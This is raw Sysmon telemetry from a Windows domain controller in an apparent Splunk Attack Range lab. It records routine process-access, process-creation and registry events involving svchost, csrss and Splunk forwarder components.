13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-43E8-6000-0A01-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.211{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E8-6000-0A01-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:20.213{08A6967A-43E8-6000-0A01-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:15:52.534{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0x624ebd78) 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.915{08A6967A-441F-6000-0C01-000000009A01}41563900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-441F-6000-0C01-000000009A01}4156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-441F-6000-0C01-000000009A01}4156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-441F-6000-0C01-000000009A01}4156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.775{08A6967A-441F-6000-0C01-000000009A01}4156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-441F-6000-0B01-000000009A01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\W